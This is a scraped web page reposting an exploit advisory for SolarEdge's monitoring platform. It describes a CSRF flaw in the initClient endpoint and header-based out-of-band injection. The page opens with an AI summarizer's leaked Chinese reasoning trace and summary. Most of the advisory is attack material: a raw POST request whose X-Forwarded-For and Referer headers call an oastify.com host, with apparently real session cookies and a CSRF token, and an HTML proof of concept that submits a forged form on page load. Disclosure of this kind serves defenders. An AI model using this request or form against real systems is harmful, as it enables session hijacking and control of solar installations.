好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读用户提供的文章内容。 文章标题是“solaredge-CSRF-OOB-Injection”,作者是nu11secur1tyAI,日期是2026年4月26日。软件名称是SolarEdge Monitoring Platform的框架部分,参考链接是https://monitoring.solaredge.com/。 描述部分提到,这个漏洞是因为/solaredge-web/p/initClient端点的业务逻辑存在缺陷。系统允许通过未经验证来源的POST请求生成和覆盖会话参数。攻击者可以利用这一点,在合法操作员不知情的情况下执行未经授权的命令。此外,还发现了通过X-Forwarded-For和Referer头进行的OOB注入漏洞,迫使SolarEdge内部基础设施向攻击者控制的域发起请求,导致会话被劫持和对光伏系统的潜在控制。 状态是中等到高危。Payload部分是一个POST请求,包含一些参数和头信息。Exploit部分是一个HTML表单,用于发起CSRF攻击。 接下来,我需要将这些信息浓缩到100字以内。重点包括:SolarEdge监控平台存在CSRF和OOB注入漏洞,允许攻击者劫持会话并执行恶意操作,影响物理光伏系统安全。 确保语言简洁明了,直接描述内容,不需要开头语。 </think> SolarEdge监控平台存在CSRF和OOB注入漏洞,允许攻击者通过恶意请求劫持用户会话并执行未授权操作,威胁光伏发电系统安全. 2026-4-26 21:7:15 Author: cxsecurity.com(查看原文) 阅读量:21 收藏
solaredge-CSRF-OOB-Injection# Titles: solaredge-CSRF-OOB-Injection # Author: nu11secur1tyAI # Date: 2026-04-26 # Vendor: SolarEdge Technologies Ltd. # Software: SolarEdge Monitoring Platform - Framework /solaredge-web/ # Reference: https://monitoring.solaredge.com/ ## Description: The solaredge-CSRF-Hijack vulnerability arises due to a critical business logic flaw in the `/solaredge-web/p/initClient` endpoint. The system allows the generation and overwriting of session parameters (`createCookie`) via POST requests that are not properly validated against their origin. An attacker can exploit this flaw to force a legitimate operator's browser to execute unauthorized commands without their knowledge. Additionally, an Out-of-Band (OOB) injection vulnerability was discovered via the `X-Forwarded-For` and `Referer` headers. By manipulating these headers, an attacker forces the SolarEdge internal infrastructure to initiate requests to external, attacker-controlled domains (e.g., oastify.com or a custom malicious site). This demonstrates a lack of framework-level filtration, leading to session compromise and potential unauthorized control over physical photovoltaic systems. STATUS: MEDIUM - HIGH/ Vulnerability [+]Payload: ``` POST POST /solaredge-web/p/initClient?cmd=createCookie&target=login&client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue HTTP/2 Host: monitoring.solaredge.com Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="146", "Not;A=Brand";v="24", "Google Chrome";v="146" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" X-Forwarded-For: cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Cookie: JSESSIONID=6F1B6162792D05EFCE515BF203A1921E9D85FA41057990C6C526B90DAEB5D65BFE52B0034F4F2D5B10424FFE2CBA711A654936F114998927041CA486611931EE3C0F205C04CA429EC894DF7A64DE9DB5108F3140B957001C751D7A57EF756DDD7971301F05C962751C9CA2F4D39478356BDF1D2ABEF343E3B0C8D5D9FF19A8F2; cf_clearance=DtyVi9hHPwvwTxW7i3XtdkHyMQmr.8bxpKOx7YOux2k-1777189382-1.2.1.1-Oe0DEHsLmJqAbUfnWsvheB8svxkc8b6u25VOWn6Q5.47kl..hy7lFUAWAFjjxFt3iVZDZvc.3dByQVMD7OKuyNedVj14sw4mf3ixhjjUzo.u8AbMMvMzr3dTFA.4ZMxREUB6w_km08hdN2Q9dqPdyl6a3Yo2ClDEosIsGuHs5gZkTMybd50CzjFB8UhCMfJDkUND4ZgT7yhn9nuwGnRpOdiW9xeQyMCzd52WXjDuGnrAADkNCbkOM.6VcWypMaA.f2gz2TVRI9gXPqpGBlnxTiwQB25NHZe_oxGVldzLBNdG0M42RlULw5G7DAcF_r1wh.UGpZYS8D4007p9.A_OAQ; __cf_bm=PxF5ZT6Bu4Jvd86dcTD_ayOFIDAo62QeOUj7C0QEn_s-1777189382.1867328-1.0.1.1-8S0957YKxPKpytYZZF4ullyTfKTwS8YpjtVRZlwNMROgEmHBO4fsAHVXdp6MPfQTg3igFXX.Ec4FXoaC5N3gaRAqF8uuepOG1x26_eex8fjMXRd9Mldj1PH43.f.p2Yb; CSRF-TOKEN=38962BC08EC10395F7DE6C11BC3794A98C5AF2B9B56066AC1830F7780E4C8394BA3D0CA2E2D5148E0BB52B778A7C8A11FD90 Origin: https://monitoring.solaredge.com Referer: http://cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com/vulnerabilities/ Content-Length: 0 ``` [+]Exploit: ```html <html> <!-- CSRF PoC --> <body> <form action="https://monitoring.solaredge.com/solaredge-web/p/initClient?cmd=createCookie&target=login&client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue" method="POST"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` # Demo: [href](https://www.patreon.com/posts/solaredge-csrf-156577436) # Time spent: 01:25:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>
Thanks for you comment!
|
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2026, cxsecurity.com
如有侵权请联系:admin#unsafe.sh